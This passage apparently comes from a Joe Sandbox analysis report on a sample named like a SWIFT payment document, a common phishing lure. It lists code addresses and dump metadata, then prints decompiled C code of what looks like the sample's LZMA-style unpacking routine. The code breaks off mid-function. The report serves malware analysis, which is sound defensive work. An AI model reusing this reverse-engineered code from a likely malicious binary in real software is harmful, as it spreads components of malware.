                                                                                  0x00406ed6
                                                                                  0x00406edc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ede
                                                                                  0x00406ede
                                                                                  0x00406ee1
                                                                                  0x00406ee4
                                                                                  0x00406ee7
                                                                                  0x00406eea
                                                                                  0x00406eed
                                                                                  0x00406ef0
                                                                                  0x00406ef3
                                                                                  0x00406ef6
                                                                                  0x00406ef9
                                                                                  0x00406efc
                                                                                  0x00406f14
                                                                                  0x00406f17
                                                                                  0x00406f1a
                                                                                  0x00406f1d
                                                                                  0x00406f1d
                                                                                  0x00406f20
                                                                                  0x00406f24
                                                                                  0x00406f26
                                                                                  0x00406efe
                                                                                  0x00406efe
                                                                                  0x00406f06
                                                                                  0x00406f0b
                                                                                  0x00406f0d
                                                                                  0x00406f0f
                                                                                  0x00406f0f
                                                                                  0x00406f29
                                                                                  0x00406f30
                                                                                  0x00406f33
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00406f35
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00406f33
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f75
                                                                                  0x00406f75
                                                                                  0x00406f79
                                                                                  0x00407581
                                                                                  0x00407581
                                                                                  0x00000000
                                                                                  0x00407581
                                                                                  0x00406f7f
                                                                                  0x00406f7f
                                                                                  0x00406f82
                                                                                  0x00406f85
                                                                                  0x00406f89
                                                                                  0x00406f8c
                                                                                  0x00406f92
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f97
                                                                                  0x00406f9a
                                                                                  0x00406f9a
                                                                                  0x00406fa0
                                                                                  0x00406f3e
                                                                                  0x00406f3e
                                                                                  0x00406f41
                                                                                  0x00000000
                                                                                  0x00406f41
                                                                                  0x00406fa2
                                                                                  0x00406fa2
                                                                                  0x00406fa5
                                                                                  0x00406fa8
                                                                                  0x00406fab
                                                                                  0x00406fae
                                                                                  0x00406fb1
                                                                                  0x00406fb4
                                                                                  0x00406fb7
                                                                                  0x00406fba
                                                                                  0x00406fbd
                                                                                  0x00406fc0
                                                                                  0x00406fd8
                                                                                  0x00406fdb
                                                                                  0x00406fde
                                                                                  0x00406fe1
                                                                                  0x00406fe1
                                                                                  0x00406fe4
                                                                                  0x00406fe8
                                                                                  0x00406fea
                                                                                  0x00406fc2
                                                                                  0x00406fc2
                                                                                  0x00406fca
                                                                                  0x00406fcf
                                                                                  0x00406fd1
                                                                                  0x00406fd3
                                                                                  0x00406fd3
                                                                                  0x00406fed
                                                                                  0x00406ff4
                                                                                  0x00406ff7
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00407286
                                                                                  0x00407286
                                                                                  0x0040728a
                                                                                  0x004075b1
                                                                                  0x004075b1
                                                                                  0x00000000
                                                                                  0x004075b1
                                                                                  0x00407290
                                                                                  0x00407290
                                                                                  0x00407293
                                                                                  0x00407296
                                                                                  0x0040729a
                                                                                  0x0040729d
                                                                                  0x004072a3
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407056
                                                                                  0x00407056
                                                                                  0x00407059
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407395
                                                                                  0x00407395
                                                                                  0x00407399
                                                                                  0x004073bb
                                                                                  0x004073bb
                                                                                  0x004073be
                                                                                  0x004073c8
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x0040739b
                                                                                  0x0040739b
                                                                                  0x0040739e
                                                                                  0x004073a2
                                                                                  0x004073a5
                                                                                  0x004073a5
                                                                                  0x004073a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407452
                                                                                  0x00407452
                                                                                  0x00407456
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x0040747b
                                                                                  0x00407482
                                                                                  0x00407489
                                                                                  0x00407489
                                                                                  0x00407490
                                                                                  0x00407493
                                                                                  0x0040749a
                                                                                  0x00000000
                                                                                  0x0040749d
                                                                                  0x00407458
                                                                                  0x00407458
                                                                                  0x0040745b
                                                                                  0x0040745e
                                                                                  0x00407461
                                                                                  0x00407468
                                                                                  0x004073ac
                                                                                  0x004073ac
                                                                                  0x004073af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407543
                                                                                  0x00407543
                                                                                  0x00407546
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x0040744d
                                                                                  0x00000000
                                                                                  0x0040717d
                                                                                  0x0040717d
                                                                                  0x0040717f
                                                                                  0x00407186
                                                                                  0x00407187
                                                                                  0x00407189
                                                                                  0x0040718c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407490
                                                                                  0x00407490
                                                                                  0x00407493
                                                                                  0x0040749a
                                                                                  0x00000000
                                                                                  0x0040749d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004071c2
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071fb
                                                                                  0x004071fb
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732e
                                                                                  0x0040732e
                                                                                  0x00407331
                                                                                  0x00407333
                                                                                  0x004075bd
                                                                                  0x004075bd
                                                                                  0x00000000
                                                                                  0x004075bd
                                                                                  0x00407339
                                                                                  0x00407339
                                                                                  0x0040733c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407342
                                                                                  0x00407342
                                                                                  0x00407346
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00000000
                                                                                  0x00407349
                                                                                  0x004071c7
                                                                                  0x004071c7
                                                                                  0x004071c9
                                                                                  0x004071cb
                                                                                  0x004071cd
                                                                                  0x004071d0
                                                                                  0x004071d1
                                                                                  0x004071d3
                                                                                  0x004071d5
                                                                                  0x004071d8
                                                                                  0x004071db
                                                                                  0x004071f1
                                                                                  0x004071f1
                                                                                  0x004071f6
                                                                                  0x0040722e
                                                                                  0x0040722e
                                                                                  0x00407232
                                                                                  0x0040725b
                                                                                  0x0040725e
                                                                                  0x00407260
                                                                                  0x00407267
                                                                                  0x0040726a
                                                                                  0x0040726d
                                                                                  0x0040726d
                                                                                  0x00407272
                                                                                  0x00407272
                                                                                  0x00407274
                                                                                  0x00407277
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x004072ae
                                                                                  0x004072ae
                                                                                  0x004072b1
                                                                                  0x004072b4
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00000000
                                                                                  0x00407328
                                                                                  0x004072b6
                                                                                  0x004072b6
                                                                                  0x004072bc
                                                                                  0x004072bf
                                                                                  0x004072c2
                                                                                  0x004072c5
                                                                                  0x004072c8
                                                                                  0x004072cb
                                                                                  0x004072ce
                                                                                  0x004072d1
                                                                                  0x004072d4
                                                                                  0x004072d7
                                                                                  0x004072f0
                                                                                  0x004072f2
                                                                                  0x004072f5
                                                                                  0x004072f6
                                                                                  0x004072f9
                                                                                  0x004072fb
                                                                                  0x004072fe
                                                                                  0x00407300
                                                                                  0x00407302
                                                                                  0x00407305
                                                                                  0x00407307
                                                                                  0x0040730a
                                                                                  0x0040730e
                                                                                  0x00407310
                                                                                  0x00407310
                                                                                  0x00407311
                                                                                  0x00407314
                                                                                  0x00407317
                                                                                  0x004072d9
                                                                                  0x004072d9
                                                                                  0x004072e1
                                                                                  0x004072e6
                                                                                  0x004072e8
                                                                                  0x004072eb
                                                                                  0x004072eb
                                                                                  0x0040731a
                                                                                  0x00407321
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00407323
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00407321
                                                                                  0x00407234
                                                                                  0x00407234
                                                                                  0x00407237
                                                                                  0x00407239
                                                                                  0x0040723c
                                                                                  0x0040723f
                                                                                  0x00407242
                                                                                  0x00407244
                                                                                  0x00407247
                                                                                  0x0040724a
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407257
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00407259
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00407257
                                                                                  0x004071dd
                                                                                  0x004071dd
                                                                                  0x004071e0
                                                                                  0x004071e2
                                                                                  0x004071e5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f44
                                                                                  0x00406f44
                                                                                  0x00406f48
                                                                                  0x0040758d
                                                                                  0x0040758d
                                                                                  0x00000000
                                                                                  0x0040758d
                                                                                  0x00406f4e
                                                                                  0x00406f4e
                                                                                  0x00406f51
                                                                                  0x00406f54
                                                                                  0x00406f57
                                                                                  0x00406f5a
                                                                                  0x00406f5d
                                                                                  0x00406f60
                                                                                  0x00406f62
                                                                                  0x00406f65
                                                                                  0x00406f68
                                                                                  0x00406f6b
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070cf
                                                                                  0x004070cf
                                                                                  0x004070d3
                                                                                  0x00407599
                                                                                  0x00407599
                                                                                  0x00000000
                                                                                  0x00407599
                                                                                  0x004070d9
                                                                                  0x004070d9
                                                                                  0x004070dc
                                                                                  0x004070df
                                                                                  0x004070e2
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e7
                                                                                  0x004070ea
                                                                                  0x004070ed
                                                                                  0x004070f0
                                                                                  0x004070f3
                                                                                  0x004070f6
                                                                                  0x004070f7
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070fc
                                                                                  0x004070ff
                                                                                  0x00407102
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407108
                                                                                  0x0040710a
                                                                                  0x0040710a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x00407350
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407356
                                                                                  0x00407356
                                                                                  0x00407359
                                                                                  0x0040735c
                                                                                  0x0040735f
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407364
                                                                                  0x00407367
                                                                                  0x0040736a
                                                                                  0x0040736d
                                                                                  0x00407370
                                                                                  0x00407373
                                                                                  0x00407374
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407379
                                                                                  0x0040737c
                                                                                  0x0040737f
                                                                                  0x00407382
                                                                                  0x00407385
                                                                                  0x00407389
                                                                                  0x0040738b
                                                                                  0x0040738e
                                                                                  0x00000000
                                                                                  0x00407390
                                                                                  0x00407390
                                                                                  0x0040710d
                                                                                  0x0040710d
                                                                                  0x00000000
                                                                                  0x0040710d
                                                                                  0x0040738e
                                                                                  0x004075c3
                                                                                  0x004075c3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x004075fa
                                                                                  0x004075fa
                                                                                  0x00000000
                                                                                  0x004075fa
                                                                                  0x00407447
                                                                                  0x004074c7
                                                                                  0x00407490

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                  • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                  • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                  • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 98%
                                                                                  			E00407395() {
                                                                                  				void _t533;
                                                                                  				signed int _t534;
                                                                                  				signed int _t535;
                                                                                  				signed int* _t605;
                                                                                  				void* _t612;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					if( *(_t612 - 0x40) != 0) {
                                                                                  						 *(_t612 - 0x84) = 0x13;
                                                                                  						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                  						goto L132;
                                                                                  					} else {
                                                                                  						__eax =  *(__ebp - 0x4c);
                                                                                  						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                  						__ecx =  *(__ebp - 0x58);
                                                                                  						__eax =  *(__ebp - 0x4c) << 4;
                                                                                  						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                  						L130:
                                                                                  						 *(__ebp - 0x58) = __eax;
                                                                                  						 *(__ebp - 0x40) = 3;
                                                                                  						L144:
                                                                                  						 *(__ebp - 0x7c) = 0x14;
                                                                                  						L145:
                                                                                  						__eax =  *(__ebp - 0x40);
                                                                                  						 *(__ebp - 0x50) = 1;
                                                                                  						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                  						L149:
                                                                                  						if( *(__ebp - 0x48) <= 0) {
                                                                                  							__ecx =  *(__ebp - 0x40);
                                                                                  							__ebx =  *(__ebp - 0x50);
                                                                                  							0 = 1;
                                                                                  							__eax = 1 << __cl;
                                                                                  							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                  							__eax =  *(__ebp - 0x7c);
                                                                                  							 *(__ebp - 0x44) = __ebx;
                                                                                  							while(1) {
                                                                                  								L140:
                                                                                  								 *(_t612 - 0x88) = _t533;
                                                                                  								while(1) {
                                                                                  									L1:
                                                                                  									_t534 =  *(_t612 - 0x88);
                                                                                  									if(_t534 > 0x1c) {
                                                                                  										break;
                                                                                  									}
                                                                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                  										case 0:
                                                                                  											if( *(_t612 - 0x6c) == 0) {
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                  											_t534 =  *( *(_t612 - 0x70));
                                                                                  											if(_t534 > 0xe1) {
                                                                                  												goto L171;
                                                                                  											}
                                                                                  											_t538 = _t534 & 0x000000ff;
                                                                                  											_push(0x2d);
                                                                                  											asm("cdq");
                                                                                  											_pop(_t569);
                                                                                  											_push(9);
                                                                                  											_pop(_t570);
                                                                                  											_t608 = _t538 / _t569;
                                                                                  											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                  											asm("cdq");
                                                                                  											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                  											 *(_t612 - 0x3c) = _t603;
                                                                                  											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                  											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                  											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                  											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                  												L10:
                                                                                  												if(_t611 == 0) {
                                                                                  													L12:
                                                                                  													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                  													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                  													goto L15;
                                                                                  												} else {
                                                                                  													goto L11;
                                                                                  												}
                                                                                  												do {
                                                                                  													L11:
                                                                                  													_t611 = _t611 - 1;
                                                                                  													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                  												} while (_t611 != 0);
                                                                                  												goto L12;
                                                                                  											}
                                                                                  											if( *(_t612 - 4) != 0) {
                                                                                  												GlobalFree( *(_t612 - 4));
                                                                                  											}
                                                                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                  											 *(_t612 - 4) = _t534;
                                                                                  											if(_t534 == 0) {
                                                                                  												goto L171;
                                                                                  											} else {
                                                                                  												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                  												goto L10;
                                                                                  											}
                                                                                  										case 1:
                                                                                  											L13:
                                                                                  											__eflags =  *(_t612 - 0x6c);
                                                                                  											if( *(_t612 - 0x6c) == 0) {
                                                                                  												 *(_t612 - 0x88) = 1;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                  											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                  											_t45 = _t612 - 0x48;
                                                                                  											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                  											__eflags =  *_t45;
                                                                                  											L15:
                                                                                  											if( *(_t612 - 0x48) < 4) {
                                                                                  												goto L13;
                                                                                  											}
                                                                                  											_t546 =  *(_t612 - 0x40);
                                                                                  											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                  												L20:
                                                                                  												 *(_t612 - 0x48) = 5;
                                                                                  												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                  												goto L23;
                                                                                  											}
                                                                                  											 *(_t612 - 0x74) = _t546;
                                                                                  											if( *(_t612 - 8) != 0) {
                                                                                  												GlobalFree( *(_t612 - 8));
                                                                                  											}
                                                                                  											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                  											 *(_t612 - 8) = _t534;
                                                                                  											if(_t534 == 0) {
                                                                                  												goto L171;
                                                                                  											} else {
                                                                                  												goto L20;
                                                                                  											}
                                                                                  										case 2:
                                                                                  											L24:
                                                                                  											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                  											 *(_t612 - 0x84) = 6;
                                                                                  											 *(_t612 - 0x4c) = _t553;
                                                                                  											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                  											goto L132;
                                                                                  										case 3:
                                                                                  											L21:
                                                                                  											__eflags =  *(_t612 - 0x6c);
                                                                                  											if( *(_t612 - 0x6c) == 0) {
                                                                                  												 *(_t612 - 0x88) = 3;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                  											_t67 = _t612 - 0x70;
                                                                                  											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                  											__eflags =  *_t67;
                                                                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                  											L23:
                                                                                  											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                  											if( *(_t612 - 0x48) != 0) {
                                                                                  												goto L21;
                                                                                  											}
                                                                                  											goto L24;
                                                                                  										case 4:
                                                                                  											L133:
                                                                                  											_t531 =  *_t605;
                                                                                  											_t588 = _t531 & 0x0000ffff;
                                                                                  											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                  											if( *(_t612 - 0xc) >= _t564) {
                                                                                  												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                  												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                  												 *(_t612 - 0x40) = 1;
                                                                                  												_t532 = _t531 - (_t531 >> 5);
                                                                                  												__eflags = _t532;
                                                                                  												 *_t605 = _t532;
                                                                                  											} else {
                                                                                  												 *(_t612 - 0x10) = _t564;
                                                                                  												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                  												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                  											}
                                                                                  											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                  												goto L139;
                                                                                  											} else {
                                                                                  												goto L137;
                                                                                  											}
                                                                                  										case 5:
                                                                                  											L137:
                                                                                  											if( *(_t612 - 0x6c) == 0) {
                                                                                  												 *(_t612 - 0x88) = 5;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                  											L139:
                                                                                  											_t533 =  *(_t612 - 0x84);
                                                                                  											goto L140;
                                                                                  										case 6:
                                                                                  											__edx = 0;
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x34) = 1;
                                                                                  												 *(__ebp - 0x84) = 7;
                                                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                  												goto L132;
                                                                                  											}
                                                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                  											__esi =  *(__ebp - 0x60);
                                                                                  											__cl = 8;
                                                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                  											__ecx =  *(__ebp - 0x3c);
                                                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                  											__ecx =  *(__ebp - 4);
                                                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  											if( *(__ebp - 0x38) >= 4) {
                                                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                                                  													_t98 = __ebp - 0x38;
                                                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                  													__eflags =  *_t98;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                  												}
                                                                                  											} else {
                                                                                  												 *(__ebp - 0x38) = 0;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                  											if( *(__ebp - 0x34) == __edx) {
                                                                                  												__ebx = 0;
                                                                                  												__ebx = 1;
                                                                                  												goto L61;
                                                                                  											} else {
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                                  													__eflags = __eax;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 8);
                                                                                  												__ebx = 0;
                                                                                  												__ebx = 1;
                                                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                  												goto L41;
                                                                                  											}
                                                                                  										case 7:
                                                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                                                  											if( *(__ebp - 0x40) != 1) {
                                                                                  												__eax =  *(__ebp - 0x24);
                                                                                  												 *(__ebp - 0x80) = 0x16;
                                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  												__eax =  *(__ebp - 0x28);
                                                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  												__eax =  *(__ebp - 0x2c);
                                                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  												__eax = 0;
                                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  												__al = __al & 0x000000fd;
                                                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                                                  												__eflags = __eax;
                                                                                  												 *(__ebp - 0x58) = __eax;
                                                                                  												goto L69;
                                                                                  											}
                                                                                  											__eax =  *(__ebp - 4);
                                                                                  											__ecx =  *(__ebp - 0x38);
                                                                                  											 *(__ebp - 0x84) = 8;
                                                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                  											goto L132;
                                                                                  										case 8:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x84) = 0xa;
                                                                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                  											} else {
                                                                                  												__eax =  *(__ebp - 0x38);
                                                                                  												__ecx =  *(__ebp - 4);
                                                                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                  												 *(__ebp - 0x84) = 9;
                                                                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                  											}
                                                                                  											goto L132;
                                                                                  										case 9:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												goto L90;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x60);
                                                                                  											if( *(__ebp - 0x60) == 0) {
                                                                                  												goto L171;
                                                                                  											}
                                                                                  											__eax = 0;
                                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                  											__eflags = _t259;
                                                                                  											0 | _t259 = _t259 + _t259 + 9;
                                                                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                  											goto L76;
                                                                                  										case 0xa:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__ecx =  *(__ebp - 0x38);
